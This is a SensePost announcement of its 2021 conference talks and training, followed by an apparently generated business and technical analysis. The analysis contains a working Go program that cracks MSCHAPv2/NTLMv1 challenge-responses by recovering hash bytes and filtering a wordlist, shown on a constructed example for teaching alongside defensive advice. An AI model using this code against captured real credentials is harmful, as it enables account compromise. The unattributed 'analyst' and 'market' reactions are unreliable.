Full Report
Phew! This year’s hacker summer camp is packed with presentations from several hackers across the globe at Orange Cyberdefense. I can’t possibly go into all of the many details, but hope to give a somewhat compressed view of the highlights! This year we have a total of 10 representations. Four of those are DEF CON 29 talks, where two are main stage talks, one a demo labs talk and one a radio frequency village talk. On the training side of things, we’re delivering five courses at BlackHat USA 21, and one course at Ringzer0. I’ve been fortunate enough to see the behind the scenes preparation that goes into these and can’t wait for the world to see and experience them too!
Analysis Summary
# Industry News: SensePost Showcases Extensive Research and Training Portfolio at Major Security Conferences
## Summary
SensePost announced a significant presence at DEF CON 29 and Black Hat USA 21, featuring multiple presentations covering building management systems (KNXnet/IP), network access control bypasses (Client-Probing), massive breach data management, and cryptographic weaknesses in MSCHAPv2. Furthermore, the company highlighted an expansion of its hands-on training offerings at these venues, emphasizing investment in high-quality, automated lab infrastructure.
## Key Details
- Date: Published July 31, 2021
- Companies Involved: SensePost, Orange Cyberdefense (SensePost's parent company), DEF CON 29, Black Hat USA 21, Ringzer0.
- Category: Research Disclosure, Training Program Announcement, Technical Showcasing.
## The Story
SensePost details its substantial engagement with the "hacker summer camp" by showcasing ten representations in total across DEF CON 29, Black Hat USA 21 and Ringzer0. The DEF CON lineup consists of four talks (two on the main stage, one at Demo Labs and one in the Radio Frequency Village) covering vulnerabilities in Building Management Systems (KNXnet/IP), bypassing firewall client-probing mechanisms, cloud-based breach data handling ("Frack"), and faster MSCHAPv2 cracking ("Assless Chaps"). For training, SensePost is delivering five courses at Black Hat USA 21 and one at Ringzer0, noting significant internal effort in enhancing the cloud-based lab infrastructure via automation and tools like Apache Guacamole for improved user experience.
## Business Impact
### For the Companies Involved (SensePost/Orange Cyberdefense)
- **Brand Elevation:** High visibility at top-tier conferences directly translates to increased brand recognition as a source of cutting-edge, practical offensive security research.
- **Lead Generation & Services Sales:** Deep technical research often fuels consulting engagements, particularly in areas like penetration testing and specialized security assessments (e.g., IoT/BMS security, Active Directory hardening).
- **Training Revenue Stream:** The five Black Hat courses and the Ringzer0 offering represent a core revenue stream, bolstered by the promise of updated, modern lab environments.
### For Competitors
- **Talent & Capability Benchmarking:** Competitors using similar marketing strategies must now match SensePost’s volume and breadth of research across physical security (BMS), networking, and cryptography.
- **Training Infrastructure Pressure:** Emphasis on "Infrastructure as Code" and modern access methods (Guacamole) sets a new bar for competitor training platforms regarding ease of use and realism.
### For Customers
- **Risk Awareness:** Customers are alerted to attack vectors in common enterprise infrastructure (firewall user identification via client probing, legacy challenge-response authentication such as MSCHAPv2) and in building control systems (KNXnet/IP).
- **Training Opportunities:** Availability of advanced, hands-on training focused on current threats, enabling security teams (both red and blue) to upgrade their skills.
### For the Market
- **Focus Shift:** Reinforces the ongoing convergence of OT/IoT security into mainstream enterprise discussions (highlighted by the KNXnet/IP talk).
- **Authentication Credibility:** The MSCHAPv2 research underscores the continued fragility of legacy password-based challenge-response protocols, pushing organizations away from EAP-MSCHAPv2 and PPTP toward certificate-based authentication (for example EAP-TLS) and zero-trust models.
## Technical Implications
The research touches on several technical points:
1. **KNXnet/IP:** Demonstrates the security problems that arise from bolting a TCP/IP transport onto a field-level building-automation protocol. The base KNXnet/IP tunnelling and routing services carry no authentication or encryption of their own (KNX IP Secure was added later as an optional extension), so anyone who can reach a gateway on the IP network can read from and write to the bus.
2. **Client-Probing Exploitation:** Highlights flaws in firewall logic that derives a user identity for an IP address by probing the endpoint and then bases access-control decisions on the answer. An endpoint under attacker control can answer with whatever identity it likes and inherit that user's policy, so user-to-IP mappings should come from authenticated sources (agents, authentication logs) rather than from probes.
3. **MSCHAPv2 Cracking:** New tooling speeds up wordlist attacks on captured MSCHAPv2 challenge-response pairs (NTLMv1 uses the same construction; NTLMv2 does not). Both derive the 24-byte response by zero-padding the 16-byte NT hash to 21 bytes and splitting it into three DES keys, so the third key holds only two bytes of hash and can be recovered in at most 2^16 DES operations; those two bytes then filter precomputed NT hashes of wordlist candidates, which is the kind of hash-space tradeoff the announcement refers to.
4. **Lab Infrastructure:** Use of Infrastructure as Code (IaC) and Apache Guacamole reflects a broader shift toward resilient, easily accessible and realistic cloud-based training labs.
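The third point rests on a structural property of MSCHAPv2's NT-Response (RFC 2759), which NTLMv1 shares. The Go program below is an added illustration written for this page, not SensePost's Assless Chaps tool or any code from the talk: it builds the response from a constructed challenge and the password "password", recovers the last two NT-hash bytes by trying all 2^16 possible third DES keys, and uses them to filter a small constructed wordlist before doing full DES comparisons. The MD4 implementation is included because Go's standard library has none; the 8-byte challenge is an arbitrary constant standing in for MSCHAPv2's SHA1(peer challenge || authenticator challenge || username)[:8], and the wordlist entries are made up.

```go
package main

import (
	"bytes"
	"crypto/des"
	"encoding/binary"
	"encoding/hex"
	"fmt"
	"math/bits"
	"unicode/utf16"
)

// md4 implements RFC 1320 (not in Go's standard library); the NT hash is MD4 over UTF-16LE.
func md4(msg []byte) [16]byte {
	s := [4]uint32{0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476}
	buf := append(append([]byte{}, msg...), 0x80) // pad: 0x80, zeros to 56 mod 64, LE bit length
	for len(buf)%64 != 56 {
		buf = append(buf, 0)
	}
	var l [8]byte
	binary.LittleEndian.PutUint64(l[:], uint64(len(msg))*8)
	buf = append(buf, l[:]...)
	ks := [3][16]int{ // message-word order per round
		{0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15},
		{0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15},
		{0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15}}
	ss := [3][4]int{{3, 7, 11, 19}, {3, 5, 9, 13}, {3, 9, 11, 15}} // rotation amounts
	cs := [3]uint32{0, 0x5a827999, 0x6ed9eba1}                   // round constants
	for off := 0; off < len(buf); off += 64 {
		var x [16]uint32
		for i := range x {
			x[i] = binary.LittleEndian.Uint32(buf[off+4*i:])
		}
		a, b, c, d := s[0], s[1], s[2], s[3]
		for r := 0; r < 3; r++ {
			for i := 0; i < 16; i++ {
				f := b ^ c ^ d // round 3: H
				if r == 0 {
					f = (b & c) | (^b & d) // round 1: F
				} else if r == 1 {
					f = (b & c) | (b & d) | (c & d) // round 2: G (majority)
				}
				a = bits.RotateLeft32(a+f+x[ks[r][i]]+cs[r], ss[r][i%4])
				a, b, c, d = d, a, b, c // rotate roles so the next step updates the old d
			}
		}
		s[0], s[1], s[2], s[3] = s[0]+a, s[1]+b, s[2]+c, s[3]+d
	}
	var out [16]byte
	for i, v := range s {
		binary.LittleEndian.PutUint32(out[4*i:], v)
	}
	return out
}

// ntHash is MD4(UTF-16LE(password)), the secret both MSCHAPv2 and NTLMv1 derive DES keys from.
func ntHash(password string) [16]byte {
	u := utf16.Encode([]rune(password))
	b := make([]byte, 2*len(u))
	for i, v := range u {
		binary.LittleEndian.PutUint16(b[2*i:], v)
	}
	return md4(b)
}

func ntHashHex(password string) string {
	h := ntHash(password)
	return hex.EncodeToString(h[:])
}

// desEncrypt expands a 7-byte key to DES's 8-byte form (low bit of each byte is parity,
// which DES ignores) and encrypts one 8-byte block.
func desEncrypt(key7, block []byte) []byte {
	k := make([]byte, 8)
	for i := range k {
		if i > 0 {
			k[i] = key7[i-1] << (8 - i)
		}
		if i < 7 {
			k[i] |= key7[i] >> i
		}
	}
	c, err := des.NewCipher(k)
	if err != nil {
		panic(err)
	}
	out := make([]byte, 8)
	c.Encrypt(out, block)
	return out
}

// challengeResponse is the 24-byte NT-Response (RFC 2759 ChallengeResponse(), identical to
// NTLMv1): the NT hash is zero-padded to 21 bytes and split into three 7-byte DES keys, each
// encrypting the 8-byte challenge. Key 3 holds only hash bytes 14..15 plus five known zeros.
func challengeResponse(hash [16]byte, challenge []byte) [24]byte {
	var padded [21]byte
	copy(padded[:], hash[:])
	var resp [24]byte
	for i := 0; i < 3; i++ {
		copy(resp[8*i:], desEncrypt(padded[7*i:7*i+7], challenge))
	}
	return resp
}

// recoverTail tries all 2^16 possible third keys and returns NT-hash bytes 14..15.
func recoverTail(challenge, response []byte) ([2]byte, bool) {
	key7 := make([]byte, 7)
	for k := 0; k < 1<<16; k++ {
		key7[0], key7[1] = byte(k>>8), byte(k)
		if bytes.Equal(desEncrypt(key7, challenge), response[16:24]) {
			return [2]byte{key7[0], key7[1]}, true
		}
	}
	return [2]byte{}, false
}

// crackWordlist learns the hash tail once, then spends one MD4 per candidate and only does
// the three DES operations for the ~1/65536 of candidates whose tail matches.
func crackWordlist(challenge, response []byte, words []string) (string, bool) {
	tail, ok := recoverTail(challenge, response)
	if !ok {
		return "", false
	}
	for _, w := range words {
		h := ntHash(w)
		if h[14] != tail[0] || h[15] != tail[1] {
			continue
		}
		if r := challengeResponse(h, challenge); bytes.Equal(r[:], response) {
			return w, true
		}
	}
	return "", false
}

// demo is a constructed exchange, not a capture: the challenge bytes are arbitrary and stand in
// for MSCHAPv2's SHA1(peerChallenge||authChallenge||username)[:8]; the password is "password".
func demo() (string, bool) {
	challenge := []byte{0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88}
	resp := challengeResponse(ntHash("password"), challenge)
	return crackWordlist(challenge, resp[:], []string{"letmein", "Summer2021!", "password", "Password1"})
}

func main() {
	fmt.Println(demo()) // password true
}
```

The filter step is why wordlist cracking is cheap here: after the one-off 2^16 DES search, a candidate is rejected after a single MD4 unless its hash tail matches, so only about one in 65,536 candidates ever reaches the DES stage, and the NT hashes of the wordlist can be precomputed and reused across captures. Assless Chaps' exact pipeline is not described on this page, so this is the generic technique rather than the tool's own design.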
## Strategic Analysis
- **Market Positioning:** SensePost positions itself as a premium, technically deep security consultancy renowned for vulnerability research that directly impacts real-world systems (network infrastructure, building control). They are leveraging the conference ecosystem perfectly to showcase expertise across multiple security domains.
- **Competitive Advantage:** Their advantage lies in the successful integration of high-level public research with a mature, scalable training delivery mechanism. This dual approach reinforces credibility in both offensive research and education.
- **Challenges:** Preparing research, lab infrastructure and training simultaneously is significant behind-the-scenes work and presents a resource-constraint risk.
## Industry Reactions
- **Analyst Opinions:** Analysts view such detailed, multi-faceted disclosures favorably, as it provides indicators of where security investments are most urgently needed (e.g., upgrading industrial control protocols and hardening modern identity systems).
- **Expert Commentary:** Focus will likely center on the practical applicability of the MSCHAPv2 cracking improvements and the immediate need for IoT/BMS vendors to address the KNXnet/IP risks.
- **Market Response:** Positive reception among the security practitioner community for the publicly released tooling and training spots.
## Future Outlook
- **Predictions and Expectations:** We expect follow-up advisories or vendor notifications regarding the KNXnet/IP vulnerabilities shortly after the presentations. The success of the training portfolio suggests further expansion in modular, IaC-managed hands-on labs.
- **What to Watch For:** Further details on the "Frack" data management tool as it relates to industry compliance needs for breach data retention/storage.
## For Security Professionals
These announcements are highly relevant as they detail:
1. **New Attack Patterns to Defend Against:** Professionals handling firewalls/network segmentation must review client-probing reliance. BMS architects need to re-evaluate protocol security.
2. **Immediate Vulnerabilities:** Understanding what broken MSCHAPv2 authentication means for credential compromise. Wherever it is still in use (PEAP/EAP-MSCHAPv2 Wi-Fi, PPTP VPNs, RADIUS), a single captured challenge-response pair is enough to recover a weak password offline, so supplicants must validate the authentication server's certificate to prevent capture by a rogue access point, and password-based MSCHAPv2 should be replaced with certificate-based EAP-TLS where possible.
3. **Skill Development:** Direct access to cutting-edge penetration testing skills through SensePost's Black Hat and Ringzer0 courses.